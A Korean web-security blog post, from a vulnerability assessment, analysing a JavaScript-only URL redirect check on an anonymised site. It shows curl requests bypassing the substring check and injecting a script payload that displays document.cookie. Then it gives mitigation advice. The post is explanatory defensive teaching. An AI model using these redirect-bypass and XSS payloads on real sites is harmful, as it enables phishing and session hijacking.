• 웹 해킹 훈련장 172.16.15.116 40080/tcp 대상 공개용 도구 기반의 홈페이지 취약점 점검 실습 (20200507)

• Kali Linux 2020.1b 64bit 설치 설명서 (MS 윈도우 10, VMware 플레이어) (20200325)

• VirtualBox 가상머신으로 GSM CE 6.0.2 설치 설명서 (OpenVAS) (20200125)

• Kali Linux 2019.4 64bit Light 배포판 설치 설명서 (권장) (20191202)

• Kali Linux 2019.3 64bit Large 배포판 설치 및 한글 설정 설명서 (20191129)

• [과제] WH-MissAuth-1 웹해킹훈련장: 접속자 권한인증 후 출력 제어 취약점 (20180619)

• [과제] WH-WebEditor-SE2 웹해킹훈련장: 취약한 PHP 버전에서 원래 파일이름을 저장하는 웹에디터의 취약점을 이용한 시스템 침투 (20170827)

• [과제] WH-FILEDOWN-01 웹해킹훈련장: 파일다운로드로 서버침투 (20170810)

• [과제] WH-COOKIE-02 웹해킹훈련장: 쿠키 오용 취약점 (20170809)

• Apache Tomcat /manager/html 무작위대입공격 도구 작성 - PHP (20170721)

• 칼리 리눅스를 이용한 From SQL Injection to Shell 공략 (20170404)

• 단순한 방어법(../ 제거)의 파일 다운로드 취약점 진단 사례 (20170329)

• WH-WebEditor-CH 라이브 ISO: 이미지 검증 기능을 우회하여 PHP 웹쉘 생성 (20170130)

• 오늘의 웹서버 공격 로그: MySQL 관리 인터페이스 자동탐색 도구 - Jorgee Scanner (20170125)

• WH-WebEditor-GM 라이브 ISO: 이미지 검증 기능을 우회하여 PHP 웹쉘 생성 (20170123)

• 오늘의 웹서버 공격 로그: Apache ProxyAbuse 탐지 시도 (20170122)

• 오늘의 웹서버 공격 로그: Bash 쉘쇼크 취약점을 이용한 Perl Ircbot 삽입 시도 (20170122)

• 오늘의 웹서버 공격 로그: phpMyAdmin 취약점 자동탐색 도구 - ZmEu Scanner (20170121)

• 오늘의 웹서버 공격 로그: 워드프레스 취약점 자동탐색 도구 (20170118)

• WH-PathTrav-01 라이브 ISO: 파일 다운로드 취약점으로 서버 침투 (20170116)

• WH-Webshell-Loc-01 라이브 ISO: 서버 내 웹쉘 저장경로 알아내기 (20170114)

• WH-ImgShell-01 라이브 ISO: 이미지에 덧붙인 웹쉘 취약점 웹해킹훈련장 (20170113)

• SSH 무작위 대입 공격으로 root권한을 탈취한 침해사고 사례 (20170112)

• WH-IllInst-WordPress 워드프레스 웹해킹훈련장 소개 (20170110)

• WH-IllInst-WordPress 워드프레스 웹해킹훈련장 실습 설명서 (20170110)

• MSSQL과 MySQL의 SQL구문삽입을 이용한 OS 명령어 실행 (20170109)

• WH-CommInj-01 원격 운영체제 명령어 삽입 취약점 훈련장(라이브 ISO) 소개 및 실습 설명서 (20170106)

• WH-Deface-01 기능별 권한인증 취약점 훈련장(라이브 ISO) 소개 (20170104)

• WH-Deface-01 웹해킹훈련장 실습 설명서 (20170104)

• WH-Account-01 회원가입 취약점 훈련장(라이브 ISO) 소개 (20170102)

• WH-Account-01 웹해킹훈련장 실습 설명서 (20170103)

• WH-Account-02 회원정보수정 취약점 훈련장(라이브 ISO) 소개 (20170103)

• WH-Account-02 웹해킹훈련장 실습 설명서 (20170104)

• 저장형 XSS 공격을 이용한 홈페이지위변조 공격 사례 (20161231)

• 로그인한 상태에서 웹취약점스캐너의 자동점검 위험성 (20161228)

• DBMS Fingerprinting (데이터베이스 관리시스템 탐지) (20161222)

• FCKeditor를 대상으로 한 자동화 공격툴의 침해사례 (20161220)

• 이중 서버스크립트 혼용을 이용한 웹방화벽/확장자검증 우회 (실제 사례) (20161219)

• HTTP/HTTPS 혼용에 따른 관리자로그인 페이지 접근 우회 (실제 사례) (20161214)

• 경로재지정 취약점: 자바스크립트를 이용한 검증과 그 우회, 그리고 XSS (실제 사례) (20161214)

• 웹해킹 사례: 유명 홈페이지를 악성코드 배포 경유지로... (20161213)

• HTML 삽입, XSS 공격 탐지방법 (20161211)

• 오늘의 웹서버 공격 로그, Axis2, 공개프록시 (20161210)

• 오늘의 웹서버 공격 로그, XML-RPC, Open Proxy (20161208)

• nikto와 owasp-zap 연동 (20161206)

• 미라이 IoT DDoS 봇넷이 사용한 61개 비밀번호 (20161205)

• 오늘의 웹서버 공격 로그, SOAP 원격코드실행, D-Link 명령어 삽입, muieblackcat (20161205)

• 오늘의 웹서버 공격 로그, w00tw00t (DFind) (20161204)

• 기억하기 쉽고 안전한 비밀번호 만들기 (20161203)

• 2016.12.01-02 웹서버 공격 로그, armgg DDoS 악성코드 (20161202)

• KISA의 랜섬웨어 예방 수칙 (20161202)

• WH-DVWA-1.9 Damn Vulnerable Web App 웹해킹훈련장 (20161201)

• DVWA Brute Force 실습 설명서 (20161205)

• DVWA Command Injection 실습 설명서 (20161207)

• DVWA CSRF (low, high level) 실습 설명서 (20161208)

• DVWA File Inclusion 실습 설명서 (20161215)

• DVWA File Upload 실습 설명서 (20161221)

• DVWA SQL Injection (low, medium, high level) 실습 설명서 (20161224)

• DVWA SQL Injection medium level - OWASP-ZAP과 sqlmap 실습 설명서 (20161222)

• DVWA Blind SQLi (high level) 수동점검을 통한 '눈먼'SQL 구문삽입의 이해 (20161227)

• DVWA Blind SQL Injection (low, medium level) sqlmap 실습 설명서 (20161226)

• DVWA Reflected Cross Site Scripting (XSS) 실습 설명서 (20161227)

• DVWA Stored Cross Site Scripting (XSS) 실습 설명서 (20170101)

• SVG 이미지의 ECMAscript를 이용한 악성코드 배포 (20161201)

• WH-WebGoat-7.0.1 웹해킹훈련장 라이브 ISO (20161130)

• WebGoat: Bypass a Path Based Access Control Scheme (20161207)

• WebGoat, LAB: DOM-Based cross-site scripting (20161208)

• WebGoat, Authentication Flaws: Multi Level Login 2 (20161209)

• WebGoat, Code Quality: Discover Clues in the HTML (20161210)

• WebGoat XSS: Phishing with XSS (20161211)

• WebGoat: OS Command Injection (20161215)

• WebGoat: Numeric SQL Injection (20161216)

• WebGoat: String SQL Injection (UNION기반 SQL 구문삽입의 이해) (20161217)

• WebGoat: Blind Numeric SQL Injection (추리기반 SQL 구문삽입의 이해) (20161218)

• 2016.11.30 웹서버 공격 로그 (20161130)

• OWASP TOP 10 (2013) 문서의 각종 해킹 시나리오 모음 (20161129)

• WH-LFI-01: 널바이트삽입과 내부파일실행 웹해킹훈련장 (20161126)

• WH-LFI-01 웹해킹훈련장의 취약점 분석 결과보고서 (20161128)

• 인터넷(Internet)과 보안에 대해 짧게 생각해보다 (20161125)

• PHP Easter Egg의 이해와 조치방안 (20161125)

• WH-COOKIE-01: 잘못된 쿠키 사용 사례를 보여주는 웹해킹훈련장 (20161124)

• WH-COOKIE-01 웹해킹훈련장 홈페이지 취약점분석 결과보고서 (20161126)

• 웹해킹 공격/방어 일람 (20161121)

• webhack.dynu.net 문자배너 만들기 - toilet (20161121)

• MIME 형식의 보안위협 완화: X-Content-Type-Options 헤더 (20161120)

• X-XSS-Protection헤더 시험 페이지 (20161119)

• 방화벽을 노리는 블랙너스(Black Nurse) DoS 공격 (20161118)

• 클릭재킹 방지를 위한 X-Frame-Options 헤더 (20161117)

• X-Frame-Options헤더 시험 페이지 (20161118)

• 공시생 성적조작 사건, 물리보안과 정보보안 (20161117)

• ID/PW 평문전송, 정말 그렇게 큰 취약점인가? (20161116)

• [웹해킹훈련장] 취약한 비밀번호: WH-weak-root-pw 실습 설명서 (20161116)

• weak-root-pw 훈련장 웹취약점 분석 보고서 (20161117)

• 슬리타즈 리눅스 4.0 설치와 웹해킹훈련장 Live ISO 만들기 (20161115)

• 버추얼박스 가상머신에서 Tails OS 설치 (20161114)

• Kali Linux에 Tor Browser 설치하기 (20161114)

• 인터넷익명성 - VPN과 Tor (20161114)

• Kali Linux, open-vm-tools, Shared Folder (20161113)

• SSL Strip 공격과 HSTS (20161112)

• 모든 꼬리표 모아보기(태그 클라우드) (20161111)

• HTTP 세션 탈취와 IP보안 (20161111)

• HTTP TRACE method와 XST 공격 (20161111)

• 세션쿠키와 HttpOnly (20161110)

• HTTP 메소드 수동점검 방법 (20161110)

• 파일업로드(웹쉘) 방어하기 (20161109)

• 파일다운로드/경로조작 방어하기 (20161109)

• XSS, SQL Injection 방어하기 (20161109)

• 길찾기(sitemap) (20161109)

• 웹취약성분석 관련 파일 목록 (20161108)

• SQL 인젝션 공격도구 sqlmap의 간단한 사용법 (20161107)

• 웹취약점 분석 도구로서의 THC Hydra (20161107)

• 웹취약점 분석 도구로서의 cURL (20161107)

• [웹해킹훈련장] CVE-2014-6271: Bash Shellshock 실습 설명서 (20161104)

• [PentesterLab] CVE-2014-6271 Shellshock 훈련장 웹취약점 분석 보고서 (20161106)

• 무료 웹해킹 교육장 목록 (20161103)

• 칼리 리눅스(Kali Linux) 설치 (20161030)

• 가상머신 버추얼 박스(VirtualBox) 설치 (20161029)

• 가상머신 VMWare Workstation Player 설치 (20161028)

• [웹해킹훈련장] Drunk Admin Web Hacking Challenge 실습 설명서 (20161027)

• 스마트에디터(SmartEditor) 2.0 Basic의 웹쉘 업로드 취약점 (20160719)

<< 목록숨기기
#경로재지정 #redirect.jsp #document.location.href #XSS #HTML 삽입 #자바스크립트 삽입 #코드삽입 #Client-side Protection #A1-Injection #A3-Cross-Site Scripting (XSS) #A10-Unvalidated Redirects and Forwards

취약한 경로재지정: 자바스크립트 검증과 그 우회, 그리고 XSS

홈페이지 취약점 점검 과정에서 경로재지정(URL Redirect) 기능이 발견되었다. 대부분의 경로재지정 기능이 Location: HTTP 헤더를 사용하는 데 비해, 여기서는 자바스크립트로 구현되어 있었다.

경로재지정 기능 분석 및 입력값 검증기능 우회

root@kali:~# curl https://target.site.kr/common/redirect.jsp?location=http://www.daum.net/?target.site.kr

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ko" lang="ko">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=EUC-KR" />
<title></title>
</head>
<body>
	<script type="text/javascript">
	//<![CDATA[
		var url = "http://www.daum.net/?target.site.kr";
		var check = true;
		if(url.indexOf("http") == 0){
			if(url.indexOf("target.site.kr") < 0){ //비정상적인 redirection 방지
				check = false;
			}
		}
		if(check){
			document.location.href = url;
		}
	//]]>
	</script>
</body>
</html>	root@kali:~#

curl을 이용하여 경로재지정 기능(/common/redirect.jsp)의 결과를 살펴보면 위와 같다. location 변수에 URL을 전달할 수 있고, 자바스크립트는 해당 URL에 target.site.kr이라는 문자열이 포함되어 있는 지를 검사한다 - if(url.indexOf("target.site.kr") < 0). 포함되어 있으면 경로를 location 값으로 전달한 url로 재지정하도록 하고 있다 - document.location.href = url;.

이러한 방식으로 웹브라우저에서 자바스크립트를 이용한 보안검증 기능은 공격자도 파악할 수가 있기 때문에 우회방법을 찾을 가능성이 매우 높다. 자바스크립트는 웹 서비스를 풍부하게 해주는 강력한 기능이지만 클라이언트(웹브라우저)에서 그 기능이 파악되므로 보안을 위한 용도로는 사용하지 않는 것이 좋다.

[ ↑ 자바스크립트를 이용한 URL 검증기능을 우회한 결과 ]

위의 그림은 자바스크립트에 포함된 문자열 검증기능을 우회하여 허용되지 않는 외부 URL(http://www.daum.net/로 경로재지정에 성공한 화면이다. 여깃 사용한 검증기능은 Javascript에서 if(url.indexOf("target.site.kr") < 0)와 같이 허용되는 URL의 일부 문자열이 포함되어 있는 지를 검사하는 것이다. 우회하는 방법은 간단하다. location 변수에 target.site.kr문자열이 포함되게 만들면 된다. URL의 특성을 이용하면 redirect.jsp?location=http://www.daum.net/?target.site.kr와 같이 최종 URL에는 영향을 전혀 미치지 않게 하는 방법을 사용하면 된다.

if(url.indexOf("target.site.kr") < 0)와 같이 문자열의 포함여부가 아니라 if(url.substring(0, 21) == "http://target.site.kr"))와 문자열의 시작이 사이트 내부일 경우에만 허용하도록 자바스크립트를 구성했다면 경로재지정 취약점은 일부 완화가 되었을 것이다. 다만 이 경우에도 http://target.site.kr/에 자바스크립트를 업로드할 수 있는 경우라면 우회가 가능할 수 있다.

자바스크립트 내 입력값 출력을 이용한 스크립트 코드 삽입과 XSS

경로재지정 시 location 변수 값이 자바스크립트(<script> 엘리먼트) 내에서 var url 값으로 할당되는 것을 볼 수 있다. 이런 경우에는 서버에서 제대로 입력값을 검증하지 않을 경우에는 자바스크립트 코드를 삽입할 수 있는 가능성이 발생한다. (자바스크립트가 서버에서 문자열로 전달된 후에 웹브라우저에서 이 문자열을 자바스크립트로 해석하기 때문에 코드삽입이 가능하게 된다.)

root@kali:~# curl https://target.site.kr/common/redirect.jsp?location=%22%3Balert%28document.cookie%29%3B%20//

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ko" lang="ko">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=EUC-KR" />
<title></title>
</head>
<body>
	<script type="text/javascript">
	//<![CDATA[
		var url = "";alert(document.cookie); //";
		var check = true;
		if(url.indexOf("http") == 0){
			if(url.indexOf("target.site.kr") < 0){ //비정상적인 redirection 방지
				check = false;
			}
		}
		if(check){
			document.location.href = url;
		}
	//]]>
	</script>
</body>
</html>	root@kali:~#

위의 예에서는 location 변수에 ";alert(document.cookie); //라는 값을 전달하였다.

		var url = "";		// null
		alert(document.cookie);	// document.cookie 출력
		//";			// 주석 처리: 자바스크립트 해석하지 않음

그 결과는 위와 동일하게 해석된다. var url 변수에는 null을 할당하고, document.cookie에 접근한다. 사선 두개(//)는 뒷 부분을 주석으로 처리한다. 결국 location 값이 정상적인 문법을 가지는 자바스크립트 코드가 된다. 이를 이용하면 다양한 XSS 공격이 가능하게 된다.

[ ↑ 사용자 입력값이 자바스크립트 내에 출력되는 점을 이용한 스크립트 코드 삽입 ]

경로재지정 변수인 location에 ";alert(document.cookie); //라는 값을 입력했을 때, Firefox 웹브라우저는 세션 키인 JSESSIONID를 비롯한 쿠키 값을 출력하는 것을 볼 수 있다. 실제 공격이라면 alert() 함수 대신 공격자에게 document.cookie 값을 전달하게 할 것이다. 공격 대상자가 관리자라면 관리자 권한을 탈취당할 가능성이 높다. 실제로 이 홈페이지의 관리자 페이지는 외부에서도 접속이 가능하였다.

마무리

경로재지정 기능이 취약하면 - 홈페이지의 유명도나 운영하는 기관의 권위를 빌어서 - 피싱(phishing) 페이지나 악성코드 배포지로 접속자를 유인할 가능성을 크게 높일 수 있다. 이 때문에 OWASP TOP 10 2013, 2010에서도 A10 Unvalidated Redirects and Forwards로 지정되어 중요한 취약점으로 여기고 있다.

Javascript는 웹브라우저로 그 코드가 전송된 후에 실행되는 클라이언트 스크립트 언어이다. 따라서 사용자는 이 코드를 볼 수가 있다. 때문에 사용자의 입력값이 자바스크립트 코드 내에 출력되는 것을 피하는 것이 좋다. 또한 보안을 위한 검증 기능도 자바스크립트로 구현하지 않아야 한다. 서버에서 입력 값을 제대로 검증하지 않으면, 이 사례에서처럼 크로스사이트스크립트와 같이 다양한 공격을 수행할 수 있기 때문이다.

[처음 작성한 날: 2016.12.14]    [마지막으로 고친 날: 2016.12.14] 

> 이 글을 목록없이 인쇄하기 편하게 보기

< 이전 글 : HTTP/HTTPS 혼용에 따른 관리자로그인 페이지 접근 우회 (실제 사례) (2016.12.14)

> 다음 글 : 웹해킹 사례: 유명 홈페이지를 악성코드 배포 경유지로... (2016.12.13)

---

이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다.
잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다.
문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문 .. -- -- | - .. .... | ... / .. .../ ... {] . .. .. .. ..| ...... .../ .../ .. ...... ... ... ] .. [ .../ ..../ ......./ .. ./// ../ ... .. ... .. -- -- | - .. .... | ... / .. .../ ... {] . .. .. .. ..| ...... .../ .../ .. ./// ../ ... .. ... ...| ..../ ./ ... / ..| ....| ........ / ... / .... ...... ... ... ] .. [ .../ ..../ ......./ .....| ..../ ./ ... / ..| ....| ........ / ... / .... ...| ..../ ./ ... / ..| ....| ........ / ... / .... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .